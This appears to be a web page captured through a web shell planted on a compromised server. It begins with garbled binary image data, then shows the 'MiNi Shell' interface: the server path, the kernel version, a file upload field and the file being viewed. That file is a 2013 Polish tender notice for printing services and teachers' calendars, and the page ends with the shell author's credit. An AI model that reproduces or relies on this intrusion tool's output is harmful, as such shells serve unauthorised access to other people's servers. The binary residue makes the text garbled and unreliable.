JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130207/52284-N-2013.html

<p class="kh_header"><b>Szczecin: Wykonanie usługi drukarskiej oraz zaprojektowanie i wykonanie kalendarzy książkowych na rok szkolny 2013/2014</b><br>
<b>Numer ogłoszenia: 52284 - 2013; data zamieszczenia: 07.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zachodniopomorskie Centrum Doskonalenia Nauczycieli , ul. J. Sowińskiego 68, 70-236 Szczecin, woj. zachodniopomorskie, tel. 091 4350 622, faks 091 422 52 24.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zcdn.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: wojewódzka samorządowa jednostka budżetowa nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi drukarskiej oraz zaprojektowanie i wykonanie kalendarzy książkowych na rok szkolny 2013/2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia Zamawiający podzielił na dwa zadania ( części):
Zadanie (część)  nr 1 :
1)	Wydruk teczek na materiały szkoleniowe dla Zachodniopomorskiego Centrum Doskonalenia Nauczycieli na podstawie przekazanego pliku w formacie PDF.
a)	papier: kreda matowa, 300g/m2, biała, dwustronnie powlekana
b)	format po złożeniu: bliski A4 (adekwatny do przechowywania dokumentów w formacie A4)
c)	kolor: 4/0
d)	druk całości na spad
e)	bigowanie 
f)	nakład: 4 500 szt.
Ewentualna adaptacja pliku do wykrojnika posiadanego przez Wykonawcę, po uzyskaniu zgody Zamawiającego. Przed wykonaniem wydruku finalnego obowiązek dostarczenia Zamawiającemu jednego egzemplarza w celu akceptacji tonacji i nasycenia barw. Możliwość rozpoczęcia wydruku pełnego nakładu jedynie po uzyskaniu pisemnej (drogą e-mail) akceptacji Zamawiającego.
2)	Wydruk spersonalizowanych wizytówek w formacie 55 mmx90 mm w ilości 7 550 szt. Projekt indywidualny przygotowany przez Zamawiającego 44 rodzaje spersonalizowanych wizytówek. Format wizytówki: 55mm x 90mm Nakład wydruku poszczególnych typów zgodny z podaną tabelą. Nakład całkowity - 7550 sztuk. Druk w kolorze (4/0 CMYK). Papier: biała kreda matowa dwustronnie powlekana 250-300g/m2. Wizytówki pakowane w paczki, każdy rodzaj wizytówki osobno. Sposób pakowania: papier pakowy; zabezpieczone brzegi, każda paczka opisana danymi widniejącymi na wizytówce.

l.p.	Rodzaj wizytówki	Nakład
1.	2 rodzaje		500 szt. 
2.	4 rodzaje		300 szt. 
4.	8 rodzajów		200 szt. 
5.	15 rodzajów		150 szt. 
6.	15 rodzajów		100 szt. 
Przed wykonaniem wydruku finalnego Wykonawca ma obowiązek dostarczenia Zamawiającemu wydruku próbnego w celu akceptacji tonacji i nasycenia barw. Możliwość rozpoczęcia wydruku pełnego nakładu nastąpi niezwłocznie po uzyskaniu pisemnej (drogą e-mail) akceptacji Zamawiającego. 

3)	Wydruk notesów w ilości 4 500 szt., A4 klejonych, z okładką usztywniającą z tyłu (bez nadruków biała tekturka obustronnie powlekana). Środki - 10 kartek, papier offsetowy, biały 80g/m2, nadruk 2/0 (kolory Panthone) zgodnie z przekazanym projektem. W celu weryfikacji przez Zamawiającego nasycenia barw oraz staranności wykonania przedmiotu zamówienia Wykonawca jest zobowiązany do dostarczenia wydruku próbnego. Możliwość rozpoczęcia wydruku pełnego nakładu nastąpi niezwłocznie po uzyskaniu drogą pisemną (e-mail) akceptacji Zamawiającego
4)	Wydruk papieru firmowego na podstawie przekazanego pliku w formacie PDF w ilości 50 000 szt. 
a)	papier: offset 90g/m2,, kolor biały
b)	format po przycięciu: A4
c)	kolor 4/0
d)	druk całości na spad

Zadanie (część)  nr 2 :
Zaprojektowanie zgodnie z wymogami Zamawiającego i wykonanie kalendarzy książkowych na rok szkolny 2013/2014. Format kalendarza - bliski formatowi A4 (ok. 21x26,5 cm). Nakład 3200 egzemplarzy.
OPRAWA. Oprawa twarda indywidualna.Projekt okładki indywidualny, zgodny z zaleceniami Zamawiającego. Ilość korekt projektu zależna od Zamawiającego. Wymagana jest pisemna akceptacja projektu przez Zamawiającego (drogą e-mail).
Wykonanie okładki - oprawa twarda z okleiną, papier do okleiny zgodny z technologią wykonania sztywnych opraw publikacji wielostronicowych, nadruk CMYK 4+0, folia błysk lub mat (w zależności od projektu) na całości, punktowy lakier błyszczący lub matowy (w zależności od projektu) na elementach okładki wskazanych przez Zamawiającego po akceptacji projektu. 
Druk całości na spad. Narożnik okładki - prosty. Grzbiet prosty.
WNĘTRZE. Wyklejka
Projekt indywidualny, zgodny z zaleceniami Zamawiającego zadrukowanej wyklejki łączącej okładkę kalendarza z blokiem - zarówno otwierającej jak i zamykającej blok kalendarza. Ilość korekt projektu zależna od Zamawiającego. Wymagana jest pisemna akceptacja projektu przez Zamawiającego (drogą e-mail). Wykonanie wyklejki - kreda mat, gramatura zgodna z wymogami technologicznymi, druk CMYK 4+4, druk na spad. 
Uwzględnienie w projekcie estetyki płyt CD-ROM z ofertą szkoleń i miejsca na wklejenie kieszonki na płytę. 
Strony reklamowe
Projekt i wykonanie do 20 stron reklamowych (10 kartek), na których prezentowana będzie oferta szkoleniowa Zachodniopomorskiego Centrum Doskonalenia Nauczycieli i inne ewentualne treści. Projekt indywidualny, zgodny z zaleceniami Zamawiającego. Wymagana jest pisemna akceptacja projektu przez Zamawiającego (drogą e-mail). Treść zostanie przekazana Wykonawcy przez Zamawiającego. Wykonanie stron reklamowych - kreda mat co najmniej 120 g/m2, druk CMYK 4+4, druk na spad. Usytuowanie stron zgrupowane, zależne od Zamawiającego (na trwałe zintegrowane z blokiem kalendarza)
Zakładka
Niespersonalizowana w jednym z trzech kolorów wskazanych przez Zamawiającego (bordowa, granatowa lub szara) po dokonaniu wyboru kalendariów
Kalendaria
Zaprojektowanie poddruków, dopasowanie  do istniejących kalendariów wzorcowych i wykonanie kalendariów w formacie zgodnym z formatem kalendarza. Kolorystyka szaro-bordowa lub szaro-granatowa. Liniał kalendariów - zależny od preferencji Zamawiającego - wybór spośród istniejących wzorów kalendariów. Układ kalendariów - tydzień na rozkładówce.  Zakres godzin w dni powszednie co najmniej 8-18. Poniżej zakresu godzinowego pola notowania, kalendarzyki skrócone - bieżący i przyszły w układzie miesięcznym. Przed każdym miesiącem kalendarium skrócone miesiąca na rozkładówce z polem do notowania przy kolejnych dniach. Na każdej stronie poddruk z logotypem i/lub hasłem promocyjnym Zamawiającego w kolorze lub w wersji monochromatycznej - zależnie od preferencji Zamawiającego w czasie projektowania indywidualnych kalendariów. Na wybranych przez Zamawiającego stronach - nie więcej niż na 80- wpisanie w pole notatek zaplanowanych przedsięwzięć. Narożnik bloku kalendariów - prosty.
Języki kalendariów - co najmniej polski, niemiecki i angielski.
Papier - biały, offsetowy.
Notes - zintegrowany z blokiem kalendariów w tożsamej kolorystyce i stylistyce graficznej (czcionki, liniał)
Skrócone kalendaria lat 2012, 2013, 2014 2015 
Zakres czasowy kalendariów głównych - od 19 sierpnia 2013 do 7 września 2014.
Strona tytułowa
Projekt i wykonanie strony tytułowej z napisem: Kalendarz nauczyciela 2013/2014 i logo Zamawiającego. Projekt indywidualny, zgodny z zaleceniami Zamawiającego. Wymagana jest pisemna akceptacja projektu przez Zamawiającego (drogą e-mail). Wykonanie strony tytułowej - papier tożsamy jak w kalendariach, druk CMYK 4+0, możliwy druk na spad. Dodatkowe strony dla nauczycieli
Projekt indywidualny, zgodny z zaleceniami Zamawiającego i kolorystyką kalendariów (wymagana jest pisemna akceptacja projektu przez Zamawiającego drogą e-mail) następujących formularzy dla nauczycieli:
1)tabele planu lekcji - 1 na stronę - co najmniej 6
2)tabele danych uczniów - 1 na rozkładówkę, ilość wierszy 35 - co najmniej 2
3)tabele list uczniów wraz z ocenami - 1 na stronę, ilość wierszy 35 - co najmniej 12
4)Karta zbiorcza osiągnięć ucznia do kopiowania - 1 na 1 stronie
5)Organizacja roku szkolnego - 1 strona
Materiały stanowiące podstawę wykonania projektu zostaną przekazane przez Zamawiającego.
Wykonanie - papier i kolorystyka zgodne z wykorzystanymi do wykonania wybranych przez Zamawiającego kalendariów.
Płyta CD-ROM
Zaprojektowanie spersonalizowanego (zgodnego z layoutem kalendarza) nadruku na małą płytę CD (ok 8 cm) z ofertą szkoleń Zamawiającego. Projekt indywidualny zgodny z zaleceniami Zamawiającego (wymagana jest pisemna akceptacja projektu przez Zamawiającego drogą e-mail). Wykonanie nadruku na płytach i nagranie danych przekazanych przez Zamawiającego w formie pliku PDF. Ilość płyt tożsama z ilością kalendarzy. Usytuowanie na wewnętrznej stronie okładki zamykającej bądź otwierającej kalendarz (2 lub 3 strona okładki) przezroczystej foliowej lub plastikowej kieszonki na płytę miniCD (8cm). Umieszczenie płyt w kieszonkach. 
Przekazanie Zamawiającemu na płycie CD wszystkich projektów graficznych wykorzystanych w kalendarzu w pliku graficznym (CorelDraw wersja 9 lub InDesign wersja 4) z możliwością edycji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek jest spełniony, gdy Wykonawca oświadczy i potwierdzi dokumentami, że w okresie ostatnich trzech lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem wartości, przedmiotu, dat wykonania i odbiorców oraz potwierdzenia, że usługi zostały wykonane lub są wykonywane należycie, zrealizował co najmniej dwa zamówienia odpowiadające przedmiotowi niniejszego zamówienia,(zadanie, na które składa ofertę), o wartości nie mniejszej niż :
a)	zadanie nr 1 - 10 000 zł brutto dla każdego wskazanego zamówienia
b)	zadanie nr 2 - 30 000 zł brutto dla każdego wskazanego zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W odniesieniu do zadania nr 2 warunek w rozumieniu Zamawiającego spełni Wykonawca, który będzie dysponował osobami posiadającymi wiedzę i doświadczenie w przygotowaniu składu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmian postanowień umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy. Każda zmiana wymaga formy pisemnej w postaci aneksu pod rygorem nieważności. Zmiany umowy będą mogły być wprowadzone w związku z zaistnieniem okoliczności, których wystąpienia Zamawiający i Wykonawca nie mogli przewidzieć 
w chwili zawierania umowy, a umowa nie będzie mogła być wykonana wedle pierwotnej treści.
2. Niezależnie od powyższego Zamawiający dopuszcza możliwość zmian redakcyjnych umowy oraz zmian korzystnych z punktu widzenia realizacji przedmiotu umowy, w szczególności przyspieszających realizację, obniżających koszt ponoszony przez Zamawiającego na wykonanie przedmiotu umowy bądź zwiększających jakość przedmiotu umowy. 
3. Wszelkie zmiany wprowadzone do umowy dokonywane będą z poszanowaniem obowiązków wynikających z obowiązującego prawa, w tym w szczególności art. 140 ust. 3 ustawy Pzp oraz zasad ogólnych rządzących tą ustawą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zcdn.edu.pl /zakładka Zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zachodniopomorskie Centrum Doskonalenia Nauczycieli 70-236 Szczecin, ul. Gen. J. Sowińskiego 68, pok. 111.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2013 godzina 12:00, miejsce: Zachodniopomorskie Centrum Doskonalenia Nauczycieli 70-236 Szczecin, ul. Gen. J. Sowińskiego 68, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie usługi drukarskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Wydruk teczek na materiały szkoleniowe w ilości 4 500 szt.
2. Wydruk spersonalizowanych wizytówek w ilości 7 550 szt.
3. Wydruk notesów w ilości 4 500 szt.
4. Wydruk papieru firmowego w ilości 50 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zaprojektowanie i wykonanie kalendarzy książkowych na rok szkolny 2013/2014.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zaprojektowanie i wykonanie kalendarzy książkowych w twardej oprawie, w ilości 3200 egzemplarzy o formacie bliskim formatowi A4..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com